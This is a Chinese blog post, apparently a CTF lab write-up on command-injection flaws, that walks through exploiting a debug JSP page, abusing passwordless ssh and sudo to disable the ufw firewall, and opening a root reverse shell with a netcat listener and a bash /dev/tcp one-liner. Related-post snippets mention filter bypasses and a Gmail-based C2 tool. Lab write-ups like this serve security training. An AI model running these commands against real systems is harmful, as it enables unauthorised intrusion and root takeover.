CTF-命令执行

最新推荐文章于 2025-03-12 16:29:36 发布
最新推荐文章于 2025-03-12 16:29:36 发布
阅读量666 收藏
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/su__xiaoyan/article/details/112740306
版权

命令执行漏洞

当应用需要调用一些外部应用程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意命令到正常命令中,造成命令执行攻击。
调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,有没有多虑用户输入的情况下,就会造成命令执行漏洞。

实验环境

攻击机:192.168.0.25
靶机:192.168.0.26

实验流程

  • 端口扫描
    8080端口开放,HTTP服务
    在这里插入图片描述
    尝试访问8080端口的HTTP服务
    网站使用Tomcat服务器搭建,并且拿到网站主目录
    在这里插入图片描述
  • 网站信息探测
    敏感目录:/test.jsp
    在这里插入图片描述尝试访问该敏感页面
    通过页面描述可知这是用于检查/tmp是否有可疑内容的调试页面
    在这里插入图片描述尝试执行系统命令,能够列出/tmp目录下面的文件
    在这里插入图片描述查看/home目录下面的内容,以此判断系统中的用户有哪些
    通过显示结果判断系统中有一个普通用户——bill
    在这里插入图片描述还可以通过页面上的命令执行功能获取系统中的信息获取读取敏感文件
    在这里插入图片描述
  • 漏洞利用
    使用ssh执行root权限的命令,使用ssh 用户名@localhost登录服务器不许要身份验证
    查看bill用户使sudo命令的权限
    在这里插入图片描述尝试使用sudo命令执行命令,关闭靶机的防火墙
    注意:关闭防火墙使用的命令和操作系统的类型相关,因为靶机是Ubuntu的操作系统,系统中默认的管理防火墙的工具是ufw。
    注意:ufw是Ubuntu系统中基于iptables的防火墙管理工具。
    有关于ufw详信参考链接:https://blog.csdn.net/bigdata_mining/article/details/80699180
    在这里插入图片描述在这里插入图片描述
  • 权限提升
    攻击者监听端口,靶机执行命令利用bash反弹shell,直接获取root用户权限
    攻击者:nc -lvvp 4444
    靶机:ssh bill@localhost sudo bash -i >& /dev/tcp/192.168.0.25/4444 0>&1
    在这里插入图片描述获取flag
    在这里插入图片描述
CTF命令执行
afei001
03-29 726
练习环境     攻击机:kali     靶机:Ubuntu 17.04 1.发现靶机,进行端口扫描 root@afei:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.3.150 netmask 255.255.255.0 bro...
CTF-渗透测试靶场-命令执行
Demon
11-06 313
CTF8-渗透测试靶场-命令执行
RCE代码和命令执行漏洞及攻防详解
最新发布
Kangyan6的博客
03-12 665
一句话木马实际上是利用了代码执行漏洞原理,webshell 是一个将各种操作命令/代码写好的工具,比如蚁剑连接一句话木马,连接密码就是一句话中的参数名,连接成功后执行任意操作,实际上就是将对应操作的代码自动输入到参数名。网站的应用决定了网站的漏洞走向,比如小说网站涉及文件上传漏洞,所以判断网站存在什么执行漏洞要看网站应用,像单纯的新闻页面展示,源码中不不存在执行漏洞的。passthru():能将字符串作为 OS 命令执行,只调用命令不返回任何结果,但把命令的运行结果原样输出到标准输出设备上。
ctf命令执行
qq_46540840的博客
03-24 890
文章目录前言一、知识要点二、举栗子1.CTFHub 技能树 综合过滤2.CTFHub 第一题附上一道简单题 前言 这里整理了一下基础题常用的过滤替代后续等深入学习时会再大幅不冲. 入门的话推荐ctfhub命令执行,上面有基础题适合小白入门比如还没入门的我wuwu… 一、知识要点 空格过滤替换品(常用为以下几个) %09(Tab键) IFS,IFS,IFS,IFS9,9,9,{IFS},$IFS < <> 重定向符 cat过滤替换品 more:一页一页的显示内容(linux环境下文本
gmailc2:一款基于Google SMTP的完全无法检测的C2服务器
qq_53058639的博客
07-24 1083
1、持久化;2、支持Shell访问;3、查看系统信息;4、…
CTF-命令执行【超详细】
qq_53058639的博客
02-02 761
作者简介:不知名白帽,网络安全学习者。
java红酒网站源码-ctf-katana:ctf-武士刀
06-05
要尝试以匿名用户的身份列出共享,请执行此操作(由于某些奇怪的原因,这并不总是有效) smbmap -H 10.10.10.125 -u anonymous 或者您可以尝试: smbmap -H 10.10.10.125 你可以像这样指定一个域: smbmap -H 10.10....
2024年网安最全ctfshow-web-命令执行
2401_84264610的博客
05-01 311
①直接执行系统命令???”);???②内敛执行??c=echo;③利用参数输入+eval?④利用参数输入+include+伪协议(不用括号、分号)?2. web30过滤了php、flag、system补充打印文件命令?c=echo%20;3. web31其他的过滤了无所谓,但过滤了.和空格①其实就是highlight_file(flag.php);的url编码,适用php7?c=(
ctf-wscan-master.zip
12-08
1. **解压文件**:首先,你需要用`unzip`命令解压文件,例如:`unzip ctf-wscan-master.zip`。这将创建一个名为`ctf-wscan-master`的目录,包含所有解压的文件。 2. **进入目录**:使用`cd`命令进入解压后的目录,...
网络安全CTF系列培训教程之Web篇-命令执行漏洞
ctfayang的博客
07-05 662
命令执行漏洞就是黑客可以直接在web应用中执行系统命令,从而获取敏感信息或者拿下shell权限。
CTF-命令执行部分总结
weixin_44770698的博客
05-29 1924
因为自己是小白,还是想着尽量快一点的学习到许多知识,最近又做了CTFshow里面的部分萌新题,这里总结一下其中的部分萌新WEB题。 web 9 要求我们使用GET方式传入c参数,参数中还要匹配到system或者exec等关键字,这里算是一个小坑,还以为是不能有这些关键字,还尝试了passthru、和拼接绕过......很尴尬。 这个比较简单我们使用system来执行查看config.php就可以了。 web 10 这个题的含义就是正则匹配到system、exec等,则会提示你cmd e
CTF练习:HTTP服务之命令执行
qq_43233085的博客
12-05 625
CTF练习:HTTP服务之命令执行环境准备信息收集漏洞利用 靶机地址: 链接: https://pan.baidu.com/s/1axC2PaXqscbZKNpTq3dTkg 提取码: t8uz 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172.19.91.88 ifconfig 查看靶机的IP,为172.19.91.8...
CTF知识集-命令执行
星河梦瑾的博客
12-17 1170
includePATHAlinux的shell如果过滤空格,可以截取环境,例如执行命令env,会出现一堆命令。
CTF之代码/命令执行
m0_62102520的博客
07-13 392
1.命令执行介绍 2.命令执行原理 3.代码执行介绍
ctfshow-命令执行
weixin_45794666的博客
12-19 4296
命令执行 反引号`` 反引号``即命令替换 是指Shell可以先执行``中的命令,将输出结果暂时保存,在适当的地方输出 单引号,双引号 适用条件:过滤了字符串 放在shell命令中,绕过正则匹配且不影响原意 空格绕过 > < <> 重定向符 %09(需要php环境) ${IFS} $IFS$9 {cat,flag.php} //用逗号实现了空格功能 %20 %09 读文件绕过(cat绕过) 适用条件:过滤了cat 1)more:一页一页的显示档案内容 (2)less:与 mor
CTF命令执行学习笔记
qq_42911487的博客
10-31 3142
CTF命令执行学习笔记 php常见的命令执行函数(这里只谈命令执行不涉及代码执行) system、popen、shell_exec、exec、passthru、反引号(比如echo ls;反引号实际是shell_exec的另一种形式) //通常以以下形式出现,题外话eval中可以直接闭合php标签另起一个php... <?php $a=$_GET[1]; //一些过滤 system($a); ?> 命令执行绕过空格 1.$IFS、$IFS$9、$IFS$@、$IFS$*等 在linux中IFS
CTF命令执行RCE
qq_53099119的博客
04-02 4308
md5() 函数计算字符串的 MD5 散列。md5() 函数使用 RSA 数据安全,包括 MD5 报文摘要算法。来自 RFC 1321 的解释 - MD5 报文摘要算法:MD5 报文摘要算法将任意长度的信息作为输入值,并将其换算成一个 128 位长度的"指纹信息"或"报文摘要"值来代表这个输入值,并以换算后的值作为结果。MD5 算法主要是为数字签名应用程序而设计的;
ctf php命令执行漏洞
02-19
### CTF竞赛中PHP命令执行漏洞 #### 漏洞利用原理 在CTF竞赛中,PHP命令执行漏洞通常涉及通过特定输入点向服务器发送恶意指令。当应用程序未正确过滤用户输入并将其作为参数传递给能够执行系统命令的函数时,就会...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值